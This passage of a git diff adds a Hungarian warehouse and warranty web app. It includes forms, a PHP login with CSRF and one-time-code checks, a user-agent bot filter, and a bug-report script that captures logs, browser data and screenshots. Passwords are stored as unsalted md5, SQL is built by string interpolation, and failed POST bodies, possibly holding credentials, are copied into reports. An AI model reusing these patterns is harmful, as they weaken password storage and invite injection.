    +
    +
    + warranty--v1 +
    +
    Garanciális ügyintézés
    +
    Garancia szerinti csere
    +
    + +
    +
    + paper-waste +
    +
    Selejt kivét
    +
    Selejtből raktári kivét
    +
    + +
    +
    + worker-male +
    +
    Dolgozói kivét
    +
    Dolgozó által kivett
    +
    +
    + + +
    +
    Garanciális ügyintézés
    +
    Ügyfél garanciális igénye alapján töltse ki az adatokat
    + +
    +
    +
    + + +
    +
    + + +
    +
    + + +
    Nem kötelező
    +
    +
    + +
    +
    + + +
    +
    + + +
    +
    + + +
    +
    + +
    +
    + + +
    +
    + +
    +
    + + +
    Nem kötelező
    +
    +
    + +
    + +
    +
    +
    + + +
    +
    Selejt kivét
    +
    Raktári selejt adatait rögzítse az alábbi űrlapon
    + +
    +
    +
    + + +
    +
    + +
    +
    + + +
    +
    + + +
    +
    + + +
    +
    + +
    +
    + + +
    +
    + +
    + +
    +
    +
    + + +
    +
    Dolgozói kivét
    +
    Dolgozó által kivett terméket rögzítse itt
    + +
    + Infó: A dolgozó ID nem kötelező mező! A szaturnusz rendszerben létező fiókokhoz való társításra szolgál. +
    + +
    +
    +
    + + + +
    +
    + + +
    Válasszon a névlistából
    +
    +
    + +
    +
    + + +
    +
    + + +
    +
    + + +
    +
    + +
    + +
    +
    + +
    + +
    +
    + +
    +
    +

    Cikkszám:

    + +
    +

    Ügyfél / Raktár / Dolgozó neve:

    + +
    +

    Időtartam kezdet:

    + +
    +

    Időtartam vége:

    + +
    +

    Oldalanként:

    + +
    +

    :

    + +
    +
    + +
    +
    +
    + +
    +
    + + + + + + + + + + + + + + +
    Ügyfél / Raktár / Dolgozó neveCikkszámDátumJobb dbBal dbAdatlap
    +
    +
    + +
    +
    +

    <    0 / 0    >

    +
    + +


    + + + +
    + + + + diff --git a/error.php b/error.php new file mode 100644 index 0000000..bc10761 --- /dev/null +++ b/error.php @@ -0,0 +1,34 @@ + + + + + + Error + + + +
    +
    +

    HIBA

    +

    Hoppá! Az oldal nem található

    +

    Az oldal amit meg szerettél volna látogatni nem létezik vagy nincsen jogod megtekinteni. Lépj vissza a fő oldalra.

    + Vissza a fő oldalra +
    +
    + + + diff --git a/favicon.ico b/favicon.ico new file mode 100644 index 0000000..175982a Binary files /dev/null and b/favicon.ico differ diff --git a/img/CheckCircle.cur b/img/CheckCircle.cur new file mode 100644 index 0000000..cd43e13 Binary files /dev/null and b/img/CheckCircle.cur differ diff --git a/img/ComfyUI_temp_zryyx_00002_.png b/img/ComfyUI_temp_zryyx_00002_.png new file mode 100644 index 0000000..1dbdee4 Binary files /dev/null and b/img/ComfyUI_temp_zryyx_00002_.png differ diff --git a/img/Saturnus.png b/img/Saturnus.png new file mode 100644 index 0000000..c047d85 Binary files /dev/null and b/img/Saturnus.png differ diff --git a/img/Saturnus.svg b/img/Saturnus.svg new file mode 100644 index 0000000..907c08e --- /dev/null +++ b/img/Saturnus.svg @@ -0,0 +1,676 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/img/loading.gif b/img/loading.gif new file mode 100644 index 0000000..5ec12c2 Binary files /dev/null and b/img/loading.gif differ diff --git a/img/protection.gif b/img/protection.gif new file mode 100644 index 0000000..4c87be3 Binary files /dev/null and b/img/protection.gif differ diff --git a/img/shieldno.gif b/img/shieldno.gif new file mode 100644 index 0000000..afd8545 Binary files /dev/null and b/img/shieldno.gif differ diff --git a/img/shieldok.gif b/img/shieldok.gif new file mode 100644 index 0000000..e96c652 Binary files /dev/null and b/img/shieldok.gif differ diff --git a/img/success.gif b/img/success.gif new file mode 100644 index 0000000..63ab3d8 Binary files /dev/null and b/img/success.gif differ diff --git a/img/szatunalogo.png b/img/szatunalogo.png new file mode 100644 index 0000000..9f3aa3e Binary files /dev/null and b/img/szatunalogo.png differ diff --git a/index.php b/index.php new file mode 100644 index 0000000..7b4b55f --- /dev/null +++ b/index.php @@ -0,0 +1,398 @@ + 0, + 'path' => '/', + 'domain' => $_SERVER['HTTP_HOST'], + 'secure' => true, + 'httponly' => true, + 'samesite' => 'Strict' +]); +session_start(); + +$ServerLocalIP = trim(shell_exec('hostname -I | cut -d" " -f1')); + +$userip = $_SERVER['REMOTE_ADDR']; + +if (isset($_POST['login']) && $_POST['login'] == "islogin") { + $usr = htmlspecialchars($_POST['usr']); + $otc = htmlspecialchars($_POST['otc']); + $pass = md5(htmlspecialchars($_POST['psw'])); + $anticsrf = htmlspecialchars($_POST['anticsrf']); + + if ($otc == "UNSET") { + $otc = ""; + } + + $useragent = $_SERVER['HTTP_USER_AGENT']; + + $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://"; + $host = $_SERVER['HTTP_HOST']; + $currentUrl = $protocol . $host; + + $getagent = json_decode(file_get_contents($currentUrl."/js/bot.php?j=1&a=".urlencode($useragent))); + + if ($anticsrf == $_SESSION['anticsrfid'] && $getagent->status == "ok") { + + $uname = $coderclass->encode($usr, "S1TU"); + $sql = mysqli_query($conn,"SELECT uid,upass,status,otphash,otptype FROM users WHERE uname = '$uname'"); + $user = mysqli_fetch_array($sql); + + if ($user != null && $user[2] < 1) { + echo '{"result":"A megadott fiók jelenleg nem tud bejelentkezni."}'; + setcookie('auth_token', '', [ 'expires' => time() - 3600, 'path' => '/', 'domain' => $_SERVER['SERVER_NAME'], 'secure' => true, 'httponly' => true, 'samesite' => 'Strict']); + exit(); + } else if ($user != null && $user[3] != "" && $otc == "" && ((!isset($_COOKIE['otpauth']) || $_COOKIE['otpauth'] != md5($user[3])) || ($user[4] == 1 || $user[4] == 3) )) { + echo '{"result":"otp"}'; + setcookie('auth_token', '', [ 'expires' => time() - 3600, 'path' => '/', 'domain' => $_SERVER['SERVER_NAME'], 'secure' => true, 'httponly' => true, 'samesite' => 'Strict']); + exit(); + } else if ($user[1] === $pass && $user != null) { + if ($user[3] != "") { + if ($totp->getOtp($coderclass->decode($user[3], "J57A")) == $otc || (isset($_COOKIE['otpauth']) && $_COOKIE['otpauth'] == md5($user[3]) && ($user[4] == 0 || $user[4] == 2))) { + if ($user[4] == 0 || $user[4] == 2) { + setcookie("otpauth", md5($user[3]), [ + 'expires' => time() + (86400 * 7), + 'path' => "/", + 'domain' => $_SERVER['SERVER_NAME'], + 'secure' => true, + 'httponly' => true, + 'samesite' => 'Strict' + ]); + } + + echo '{"result":"ok"}'; + $auth_token = $coderclass->encode($user[0], $coderclass->today_private_key()); + setcookie("auth_token", $auth_token, [ 'expires' => time() + 3600, 'path' => "/", 'domain' => $_SERVER['SERVER_NAME'], 'secure' => true, 'httponly' => true, 'samesite' => 'Strict' ]); + setcookie('auth_timer', time() + 3600, ['expires' => time() + 3610, 'path' => '/', 'domain' => $_SERVER['SERVER_NAME'],'secure' => true,'httponly' => false, 'samesite' => 'Strict']); + } else { + echo '{"result":"Hibás kétlépcsős hitelesítés!"}'; + setcookie('auth_token', '', [ 'expires' => time() - 3600, 'path' => '/', 'domain' => $_SERVER['SERVER_NAME'], 'secure' => true, 'httponly' => true, 'samesite' => 'Strict']); + } + } else { + + echo '{"result":"ok"}'; + $auth_token = $coderclass->encode($user[0], $coderclass->today_private_key()); + setcookie("auth_token", $auth_token, [ 'expires' => time() + 3600, 'path' => "/", 'domain' => $_SERVER['SERVER_NAME'], 'secure' => true, 'httponly' => true, 'samesite' => 'Strict' ]); + setcookie('auth_timer', time() + 3600, ['expires' => time() + 3610, 'path' => '/', 'domain' => $_SERVER['SERVER_NAME'],'secure' => true,'httponly' => false, 'samesite' => 'Strict']); + } + + exit(); + } else { + echo '{"result":"A felhasználónév és a jelszó kombinációja helytelen."}'; + setcookie('auth_token', '', [ 'expires' => time() - 3600, 'path' => '/', 'domain' => $_SERVER['SERVER_NAME'], 'secure' => true, 'httponly' => true, 'samesite' => 'Strict']); + exit(); + } + } else { + echo '{"result":"Biztonsági titkos Token hiba! Töltse újra az oldalt."}'; + setcookie('auth_token', '', [ 'expires' => time() - 3600, 'path' => '/', 'domain' => $_SERVER['SERVER_NAME'], 'secure' => true, 'httponly' => true, 'samesite' => 'Strict']); + exit(); + } +} else if (!empty($_COOKIE['auth_token'] ?? '')) { + header("Location: dashboard/"); + exit(); +} + +$anticsrfid = bin2hex(random_bytes(24)); +$_SESSION["anticsrfid"] = $anticsrfid; + +?> + + + + + Szaturnusz + + + + + :root { + --bgcolorlight: #008000; + --bgcolordark: #007a80; + } + '; + } + ?> + +
    +

    Kétlépcsős hitelesítés

    +

    Kérjük, adja meg a hitelesítő alkalmazása által generált 6 számjegyű kódot!

    + + +
    +
    +
    +

    Biztonsági ellenőrzés

    + +

    A Javascript engedélyezése kötelező!

    + +
    +
    + + + +
    +
    +
    +
    + +
    +


    +

    Szaturnusz

    +

    Kezelőfelület

    +

    Teszt környezet

    '; + } + ?> +
    +
    +
    +
    +
    +
    +
    +
    + + + + + + diff --git a/js/bot.php b/js/bot.php new file mode 100644 index 0000000..61608aa --- /dev/null +++ b/js/bot.php @@ -0,0 +1,49 @@ + "no", "agent" => htmlspecialchars($testagent)]); + } else { + echo "no"; + } + } else { + if ($json == '1') { + echo json_encode(["status" => "ok", "agent" => htmlspecialchars($testagent)]); + } else { + echo "ok"; + } + } + + function ellenorzes($string) { + if ($string == null || $string == "") { + return true; + } + $botslist = file_get_contents('user-agents_bot-crawler.txt'); + $botarray = explode("\n", $botslist); + + for ($i=0; $i < count($botarray); $i++) { + if (strpos($botarray[$i], $string) !== false) { + return true; + } + } + + return false; + } + + +sleep($sleep); +?> diff --git a/js/bug_report.js b/js/bug_report.js new file mode 100644 index 0000000..95db35a --- /dev/null +++ b/js/bug_report.js @@ -0,0 +1,723 @@ +// Bug Report System - JavaScript rész +(function() { + const logs = []; + + const origLog = console.log; + const origError = console.error; + const origWarn = console.warn; + + console.log = function(...args) { + logs.push('[LOG] ' + args.join(' ')); + origLog.apply(console, args); + }; + console.error = function(...args) { + logs.push('[ERROR] ' + args.join(' ')); + origError.apply(console, args); + }; + console.warn = function(...args) { + logs.push('[WARN] ' + args.join(' ')); + origWarn.apply(console, args); + }; + + const origXHROpen = XMLHttpRequest.prototype.open; + const origXHRSend = XMLHttpRequest.prototype.send; + + XMLHttpRequest.prototype.open = function(method, url, async, user, password) { + this._method = method; + this._url = url; + return origXHROpen.apply(this, arguments); + }; + XMLHttpRequest.prototype.send = function(data) { + const startTime = Date.now(); + this._sendData = data; + + this.addEventListener('load', function() { + const duration = Date.now() - startTime; + logs.push(`[NETWORK] ${this._method} ${this._url} - Status: ${this.status} (${duration}ms)`); + }); + + this.addEventListener('error', function() { + const duration = Date.now() - startTime; + let errorLog = `[NET ERROR] ${this._method} ${this._url} - Failed (${duration}ms)`; + if (this._sendData && (this._method === 'POST' || this._method === 'PUT' || this._method === 'PATCH')) { + let postData = 'Unknown'; + try { + if (typeof this._sendData === 'string') { + postData = this._sendData; + } else if (this._sendData instanceof FormData) { + postData = 'FormData'; + const formDataEntries = []; + for (let [key, value] of this._sendData.entries()) { + formDataEntries.push(`${key}=${value}`); + } + if (formDataEntries.length > 0) { + postData = formDataEntries.join('&'); + } + } else { + postData = JSON.stringify(this._sendData); + } + } catch (e) { + postData = '[Cannot serialize data]'; + } + errorLog += ` - POST Data: ${postData}`; + } + logs.push(errorLog); + }); + + this.addEventListener('timeout', function() { + const duration = Date.now() - startTime; + let timeoutLog = `[NET ERROR] ${this._method} ${this._url} - Timeout (${duration}ms)`; + if (this._sendData && (this._method === 'POST' || this._method === 'PUT' || this._method === 'PATCH')) { + let postData = 'Unknown'; + try { + if (typeof this._sendData === 'string') { + postData = this._sendData; + } else if (this._sendData instanceof FormData) { + postData = 'FormData'; + const formDataEntries = []; + for (let [key, value] of this._sendData.entries()) { + formDataEntries.push(`${key}=${value}`); + } + if (formDataEntries.length > 0) { + postData = formDataEntries.join('&'); + } + } else { + postData = JSON.stringify(this._sendData); + } + } catch (e) { + postData = '[Cannot serialize data]'; + } + timeoutLog += ` - POST Data: ${postData}`; + } + logs.push(timeoutLog); + }); + + return origXHRSend.apply(this, arguments); + }; + + window.addEventListener('unhandledrejection', event => { + logs.push('[UNHANDLED PROMISE REJECTION] ' + (event.reason?.message || event.reason)); + }); + + window.onerror = function(message, source, lineno, colno, error) { + logs.push(`[GLOBAL ERROR] ${message} at ${source}:${lineno}:${colno}`); + }; + + window.addEventListener('error', event => { + if (event.target && (event.target.src || event.target.href)) { + logs.push(`[RESOURCE LOAD ERROR] ${event.target.tagName} on ${event.target.src || event.target.href}`); + } + }, true); + window.addEventListener('online', () => { + logs.push('[NETWORK STATUS] Back online'); + }); + window.addEventListener('offline', () => { + logs.push('[NETWORK STATUS] Offline'); + }); + + const origFetch = window.fetch; + window.fetch = function(input, init) { + const startTime = Date.now(); + const url = typeof input === 'string' ? input : input.url; + const method = (init && init.method) || 'GET'; + const requestBody = init && init.body; + + return origFetch.apply(this, arguments) + .then(response => { + const duration = Date.now() - startTime; + logs.push(`[NETWORK] ${method} ${url} - Status: ${response.status} (${duration}ms)`); + return response; + }) + .catch(error => { + const duration = Date.now() - startTime; + let errorLog = `[NET ERROR] ${method} ${url} - ${error.message} (${duration}ms)`; + if (requestBody && (method === 'POST' || method === 'PUT' || method === 'PATCH')) { + let postData = 'Unknown'; + try { + if (typeof requestBody === 'string') { + postData = requestBody; + } else if (requestBody instanceof FormData) { + postData = 'FormData'; + const formDataEntries = []; + for (let [key, value] of requestBody.entries()) { + formDataEntries.push(`${key}=${value}`); + } + if (formDataEntries.length > 0) { + postData = formDataEntries.join('&'); + } + } else { + postData = JSON.stringify(requestBody); + } + } catch (e) { + postData = '[Cannot serialize data]'; + } + errorLog += ` - POST Data: ${postData}`; + } + logs.push(errorLog); + throw error; + }); + }; + + const bugBtn = document.createElement('button'); + bugBtn.innerHTML = 'Hibabejelentés 🐛'; + Object.assign(bugBtn.style, { + position: 'fixed', + bottom: '30px', + left: '-97px', + zIndex: '99999', + backgroundColor: '#e74c3c', + color: 'white', + border: 'none', + borderRadius: '0px 8px 8px 0px', + cursor: 'pointer', + fontSize: '12px', + fontWeight: 'bold', + transition: 'all 0.3s ease', + width: '130px', + padding: '5px 10px', + overflow: 'hidden', + opacity: '1' + }); + + bugBtn.onmouseenter = () => { + bugBtn.style.left = '0px'; + }; + bugBtn.onmouseleave = () => { + bugBtn.style.left = '-97px'; + }; + document.body.appendChild(bugBtn); + + bugBtn.onclick = async () => { + bugBtn.textContent = 'Küldés...'; + bugBtn.disabled = true; + try { + let screenshotData = null; + let screenshotDataFull = null; + + if (typeof html2canvas !== 'undefined') { + try { + + const links = document.querySelectorAll('link[rel="stylesheet"]'); + const filterPromises = Array.from(links).map(link => { + const href = link.href; + return fetch(href) + .then(r => r.text()) + .then(css => { + css = css.replace(/color\s*\([^)]*\)/gi, '#000000'); + css = css.replace(/color-mix\s*\([^()]*(?:\([^()]*\)[^()]*)*\)/gi, '#808080'); + return css; + }) + .catch(() => null); + }); + + const cssArrays = await Promise.all(filterPromises); + const combinedCss = cssArrays.filter(c => c).join('\n'); + + const filterUnsupported = (clonedDoc) => { + const clonedLinks = clonedDoc.querySelectorAll('link[rel="stylesheet"]'); + clonedLinks.forEach(link => link.remove()); + + if (combinedCss) { + const style = clonedDoc.createElement('style'); + style.textContent = combinedCss; + clonedDoc.head.appendChild(style); + } + + clonedDoc.querySelectorAll('[style]').forEach(el => { + const style = el.getAttribute('style'); + let newStyle = style; + newStyle = newStyle.replace(/color\s*\([^)]*\)/gi, '#000000'); + newStyle = newStyle.replace(/color-mix\s*\([^()]*(?:\([^()]*\)[^()]*)*\)/gi, '#808080'); + el.setAttribute('style', newStyle); + }); + + clonedDoc.querySelectorAll('style').forEach(styleEl => { + let css = styleEl.textContent; + css = css.replace(/color\s*\([^)]*\)/gi, '#000000'); + css = css.replace(/color-mix\s*\([^()]*(?:\([^()]*\)[^()]*)*\)/gi, '#808080'); + styleEl.textContent = css; + }); + }; + + const canvas = await html2canvas(document.body, { + scale: window.devicePixelRatio || 1, + onclone: filterUnsupported + }); + + const canvasFull = await html2canvas(document.body, { + scrollX: 0, + scrollY: 0, + width: document.documentElement.scrollWidth, + height: document.documentElement.scrollHeight, + scale: window.devicePixelRatio || 1, + onclone: filterUnsupported + }); + + screenshotData = canvas.toDataURL('image/png'); + screenshotDataFull = canvasFull.toDataURL('image/png'); + } catch (e) { + console.error('Screenshot hiba:', e); + } + } + SendReport(screenshotData, screenshotDataFull); + } catch (error) { + console.error('Bug report küldési hiba:', error); + GenerateAlerts('error', 'Hiba történt a bejelentés küldése során.'); + } + }; + + + + + let currentImageMode = 'viewport'; + let drawMode = 'pen'; + let isDrawing = false; + let lastX = 0; + let lastY = 0; + let startX = 0; + let startY = 0; + let paintCanvas, paintCtx; + let baseImageViewport = new Image(); + let baseImageFull = new Image(); + let currentScreenshotData, currentScreenshotDataFull, currentText; + let savedImageData = null; + + window.switchImage = function() { + currentImageMode = document.getElementById('BUGREPORT_imageSelector').value; + setupCanvas(); + }; + window.setDrawMode = function(mode) { + drawMode = mode; + document.getElementById('BUGREPORT_penBtn').style.background = mode === 'pen' ? '#c0392b' : '#e74c3c'; + document.getElementById('BUGREPORT_rectBtn').style.background = mode === 'rect' ? '#2980b9' : '#3498db'; + document.getElementById('BUGREPORT_textBtn').style.background = mode === 'text' ? '#d68910' : '#f39c12'; + + if (mode === 'text') { + paintCanvas.style.cursor = 'text'; + } else { + paintCanvas.style.cursor = 'crosshair'; + } + }; + window.clearCanvas = function() { + setupCanvas(); + }; + window.skipPainting = function() { + const alertElement = document.querySelector('.custom-alert'); + if (alertElement) { + alertElement.remove(); + } + SendReport(currentScreenshotData, currentScreenshotDataFull, currentText, 'skipped'); + }; + window.savePaintedImage = function() { + const paintedImageData = paintCanvas.toDataURL('image/png'); + const alertElement = document.querySelector('.custom-alert'); + if (alertElement) { + alertElement.remove(); + } + SendReport(currentScreenshotData, currentScreenshotDataFull, currentText, paintedImageData); + }; + + function setupCanvas() { + const img = currentImageMode === 'viewport' ? baseImageViewport : baseImageFull; + const maxWidth = window.innerWidth * 0.8; + const maxHeight = window.innerHeight * 0.6; + + let displayWidth = img.naturalWidth; + let displayHeight = img.naturalHeight; + + if (displayWidth > maxWidth) { + displayHeight = (displayHeight * maxWidth) / displayWidth; + displayWidth = maxWidth; + } + + if (displayHeight > maxHeight) { + displayWidth = (displayWidth * maxHeight) / displayHeight; + displayHeight = maxHeight; + } + + paintCanvas.width = displayWidth; + paintCanvas.height = displayHeight; + + paintCtx.clearRect(0, 0, paintCanvas.width, paintCanvas.height); + paintCtx.drawImage(img, 0, 0, paintCanvas.width, paintCanvas.height); + } + + function GetMouseX(e, canvas) { + const rect = paintCanvas.getBoundingClientRect(); + return ((e.clientX - rect.left) * canvas.width) / rect.width; + } + function GetMouseY(e, canvas) { + const rect = paintCanvas.getBoundingClientRect(); + return ((e.clientY - rect.top) * canvas.height) / rect.height; + } + + function startDraw(e) { + if (drawMode === 'text') return; + + isDrawing = true; + lastX = startX = GetMouseX(e, paintCanvas); + lastY = startY = GetMouseY(e, paintCanvas); + } + function draw(e) { + if (!isDrawing || drawMode === 'text') return; + + const currentX = GetMouseX(e, paintCanvas); + const currentY = GetMouseY(e, paintCanvas); + + paintCtx.strokeStyle = '#e74c3c'; + paintCtx.lineWidth = 3; + paintCtx.lineCap = 'round'; + + if (drawMode === 'pen') { + paintCtx.beginPath(); + paintCtx.moveTo(lastX, lastY); + paintCtx.lineTo(currentX, currentY); + paintCtx.stroke(); + + lastX = currentX; + lastY = currentY; + } + } + function stopDraw(e) { + if (!isDrawing) return; + isDrawing = false; + + if (drawMode === 'rect') { + const endX = GetMouseX(e, paintCanvas); + const endY = GetMouseY(e, paintCanvas); + + paintCtx.strokeStyle = '#e74c3c'; + paintCtx.lineWidth = 3; + paintCtx.strokeRect(startX, startY, endX - startX, endY - startY); + } + } + function handleClick(e) { + if (drawMode !== 'text') return; + + const x = GetMouseX(e, paintCanvas); + const y = GetMouseY(e, paintCanvas); + + const text = prompt('Írja be a szöveget:'); + if (text) { + paintCtx.fillStyle = '#e74c3c'; + paintCtx.font = '16px Arial'; + paintCtx.fillText(text, x, y); + } + } + function initializePaintCanvas() { + paintCanvas = document.getElementById('BUGREPORT_paintCanvas'); + paintCtx = paintCanvas.getContext('2d'); + + paintCanvas.addEventListener('mousedown', startDraw); + paintCanvas.addEventListener('mousemove', draw); + paintCanvas.addEventListener('mouseup', stopDraw); + paintCanvas.addEventListener('click', handleClick); + + baseImageViewport.onload = () => { + setupCanvas(); + }; + + if (baseImageFull.complete || baseImageFull.naturalWidth > 0) { + setupCanvas(); + } else { + baseImageFull.onload = () => { + if (currentImageMode === 'full') { + setupCanvas(); + } + }; + } + } + + function BrowserData() { + const data = []; + + // Document + [ + { k: 'URL', v: () => document.URL }, + { k: 'referrer', v: () => document.referrer }, + { k: 'characterSet', v: () => document.characterSet }, + { k: 'contentType', v: () => document.contentType }, + { k: 'visibilityState', v: () => document.visibilityState }, + { k: 'title', v: () => document.title }, + { k: 'domain', v: () => document.domain }, + { k: 'lastModified', v: () => document.lastModified }, + { k: 'readyState', v: () => document.readyState }, + { k: 'compatMode', v: () => document.compatMode }, + { k: 'dir', v: () => document.dir }, + { k: 'fullscreenEnabled', v: () => document.fullscreenEnabled }, + { k: 'hidden', v: () => document.hidden }, + { k: 'documentElement.lang', v: () => document.documentElement.lang } + ].forEach(o => data.push(`document.${o.k} paraméter értéke: ${o.v()}`)); + + // Location + [ + 'href','protocol','host','hostname','port','pathname','search','hash','origin' + ].forEach(p => data.push(`location.${p} paraméter értéke: ${location[p]}`)); + if (location.ancestorOrigins) data.push(`location.ancestorOrigins paraméter értéke: ${[...location.ancestorOrigins].join(', ')}`); + + // Navigator alap és kiterjesztett + [ + 'userAgent','platform','language','languages','onLine','maxTouchPoints','hardwareConcurrency','deviceMemory', + 'cookieEnabled','doNotTrack','appCodeName','appName','appVersion','product','productSub','vendor','vendorSub', + 'buildID','oscpu','appMinorVersion','pdfViewerEnabled','webdriver' + ].forEach(p => { + const v = navigator[p]; + if (v!==undefined) data.push(`navigator.${p} paraméter értéke: ${Array.isArray(v)?v.join(', '):v}`); + }); + if (navigator.javaEnabled) data.push(`navigator.javaEnabled() paraméter értéke: ${navigator.javaEnabled()}`); + + // Navigator.connection + if (navigator.connection) { + ['type','downlink','rtt','effectiveType','saveData'] + .forEach(k => data.push(`connection.${k} paraméter értéke: ${navigator.connection[k]}`)); + } + + // Navigator.userAgentData (Chrome) + if (navigator.userAgentData) { + data.push(`userAgentData.mobile paraméter értéke: ${navigator.userAgentData.mobile}`); + data.push(`userAgentData.brands paraméter értéke: ${navigator.userAgentData.brands.map(b=>b.brand+'('+b.version+')').join(', ')}`); + } + + // Plugins & mimeTypes + if (navigator.plugins) data.push(`plugins paraméter értéke: ${Array.from(navigator.plugins).map(p=>p.name).join(', ')}`); + if (navigator.mimeTypes) data.push(`mimeTypes paraméter értéke: ${Array.from(navigator.mimeTypes).map(m=>m.type).join(', ')}`); + + // Window & screen + [ + 'innerWidth','innerHeight','outerWidth','outerHeight','devicePixelRatio', + 'scrollX','scrollY','name','length','screenLeft','screenTop' + ].forEach(p => data.push(`window.${p} paraméter értéke: ${window[p]}`)); + [ + 'width','height','availWidth','availHeight','colorDepth','pixelDepth', + 'availLeft','availTop','isExtended' + ].forEach(p => data.push(`screen.${p} paraméter értéke: ${screen[p]}`)); + if (screen.orientation) { + data.push(`screen.orientation.type paraméter értéke: ${screen.orientation.type}`); + data.push(`screen.orientation.angle paraméter értéke: ${screen.orientation.angle}`); + } + + // History + data.push(`history.length paraméter értéke: ${history.length}`); + data.push(`history.state paraméter értéke: ${JSON.stringify(history.state)}`); + + // Timezone & Intl + try { + const intl = Intl.DateTimeFormat().resolvedOptions(); + data.push(`timezone paraméter értéke: ${intl.timeZone}`); + data.push(`Intl.locale paraméter értéke: ${intl.locale}`); + data.push(`Intl.calendar paraméter értéke: ${intl.calendar}`); + data.push(`Intl.numberingSystem paraméter értéke: ${intl.numberingSystem}`); + } catch {} + + // Performance + if (performance) { + ['timeOrigin'].forEach(p => data.push(`performance.${p} paraméter értéke: ${performance[p]}`)); + if (performance.navigation) ['type','redirectCount'].forEach(p=>data.push(`performance.navigation.${p} paraméter értéke: ${performance.navigation[p]}`)); + if (performance.memory) ['totalJSHeapSize','usedJSHeapSize','jsHeapSizeLimit'].forEach(p=>data.push(`performance.memory.${p} paraméter értéke: ${performance.memory[p]}`)); + data.push(`performance.getEntries().length paraméter értéke: ${performance.getEntries().length}`); + if (performance.timing) { + data.push(`performance.timing.loadEventEnd paraméter értéke: ${performance.timing.loadEventEnd}`); + data.push(`performance.timing.domContentLoadedEventEnd paraméter értéke: ${performance.timing.domContentLoadedEventEnd}`); + } + data.push(`performance.now() paraméter értéke: ${performance.now()}`); + } + + // Storage & cookies + data.push(`document.cookie.length paraméter értéke: ${document.cookie.length}`); + try { data.push(`localStorage.length paraméter értéke: ${localStorage.length}`); } catch {} + try { data.push(`sessionStorage.length paraméter értéke: ${sessionStorage.length}`); } catch {} + data.push(`indexedDB elérhető: ${'indexedDB' in window}`); + data.push(`caches elérhető: ${'caches' in window}`); + + // Battery + if (navigator.getBattery) { + navigator.getBattery().then(b=>{ + ['charging','level','chargingTime','dischargingTime'] + .forEach(p=>data.push(`battery.${p} paraméter értéke: ${b[p]}`)); + }); + } + + // Crypto + data.push(`crypto elérhető: ${'crypto' in window}`); + data.push(`crypto.subtle elérhető: ${!!(crypto && crypto.subtle)}`); + data.push(`crypto.randomUUID elérhető: ${typeof crypto.randomUUID === 'function'}`); + data.push(`crypto.getRandomValues elérhető: ${typeof crypto.getRandomValues === 'function'}`); + + // Geolocation, clipboard, permissions, mediaDevices, usb, serial, bluetooth, xr, serviceWorker, sendBeacon, vibrate + [ + 'geolocation','clipboard','permissions','mediaDevices','usb','serial','bluetooth','xr','serviceWorker','sendBeacon','vibrate','keyboard','mediaCapabilities' + ].forEach(api => data.push(`${api} elérhető: ${api in navigator || api in window}`)); + + // Permissions lekérés (state) + if (navigator.permissions) { + ['geolocation','notifications','microphone','camera','clipboard-read','clipboard-write'].forEach(name => { + navigator.permissions.query({name}).then(res => { + data.push(`permissions.${name} paraméter értéke: ${res.state}`); + }).catch(()=>{}); + }); + } + + // CSS / vizuális adatok + try { + data.push(`getComputedStyle(document.body).fontFamily paraméter értéke: ${getComputedStyle(document.body).fontFamily}`); + } catch {} + data.push(`matchMedia("(prefers-color-scheme: dark)").matches paraméter értéke: ${matchMedia("(prefers-color-scheme: dark)").matches}`); + + // Dátum/idő + data.push(`Date.now() paraméter értéke: ${Date.now()}`); + data.push(`new Date().getTimezoneOffset() paraméter értéke: ${new Date().getTimezoneOffset()}`); + + // Feature detect / Events + data.push(`draggable támogatás: ${'draggable' in document.createElement('span')}`); + data.push(`pointerEvents támogatás: ${'onpointerdown' in window}`); + data.push(`touchEvent támogatás: ${'ontouchstart' in window}`); + data.push(`fullscreen API: ${'fullscreenEnabled' in document}`); + data.push(`visibility API: ${typeof document.hidden !== 'undefined'}`); + + return data; + } + + function SendReport(screenshotData, screenshotDataFull, text = "%DefaultText%", paintedImage = null) { + if (text == "%DefaultText%") { + var html = ` +

    Kérjük, írja le a hibát amit tapasztal minél pontosabban.

    + +

    + + + `; + + + const overlay = CreateAlertBox('Hibabejelentés', html, false); + document.getElementById('BUGREPORT_AlertBtnYes').onclick = function () { + var reporttext = document.getElementById("BUGREPORT_bugDescription").value; + if (reporttext == "") { + html = `

    Kérjük írja le mi történt!

    `; + CreateAlertBox("Figyelem", html); + return; + } + SendReport(screenshotData, screenshotDataFull, reporttext); + CloseAlertBox(overlay); + }; + document.getElementById('BUGREPORT_AlertBtnNo').onclick = function () { + CloseAlertBox(overlay); + bugBtn.textContent = 'Hibabejelentés 🐛'; + bugBtn.disabled = false; + }; + + } else if (paintedImage === null && screenshotData != null) { + currentScreenshotData = screenshotData; + currentScreenshotDataFull = screenshotDataFull; + currentText = text; + + baseImageViewport.src = screenshotData; + baseImageFull.src = screenshotDataFull; + + var paintHtml = ` +

    Jelölje be a problémás területeket a képernyőn.

    + +
    + + +
    + +
    + + + + +
    + +
    + +
    + +

    + + +
    + `; + + const overlay = CreateAlertBox('Hiba megjelölése (opcionális)', paintHtml, false); + document.getElementById('BUGREPORT_AlertBtnYesPaint').onclick = function () { + savePaintedImage(); + CloseAlertBox(overlay); + bugBtn.textContent = 'Hibabejelentés 🐛'; + bugBtn.disabled = false; + }; + document.getElementById('BUGREPORT_AlertBtnNoPaint').onclick = function () { + skipPainting(); + CloseAlertBox(overlay); + bugBtn.textContent = 'Hibabejelentés 🐛'; + bugBtn.disabled = false; + }; + + setTimeout(() => { + initializePaintCanvas(); + }, 100); + + } else { + bugBtn.textContent = 'Küldés...'; + bugBtn.disabled = true; + + const reportData = { + userAgent: navigator.userAgent, + url: window.location.href, + timestamp: new Date().toISOString(), + viewport: { + width: window.innerWidth, + height: window.innerHeight + }, + screen: { + width: screen.width, + height: screen.height + }, + logs: logs, + description: text, + browserData: BrowserData(), + screenshot: screenshotData, + screenshotFull: screenshotDataFull, + screenshotPainted: paintedImage !== 'skipped' ? paintedImage : null + }; + + fetch('/managers/bug_report_handler.php', { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + }, + body: JSON.stringify(reportData) + }) + .then(response => response.json()) + .then(result => { + if (result.success) { + GenerateAlerts('success', 'Hibabejelentés sikeresen elküldve! Köszönjük a visszajelzést.'); + } else { + GenerateAlerts('error', 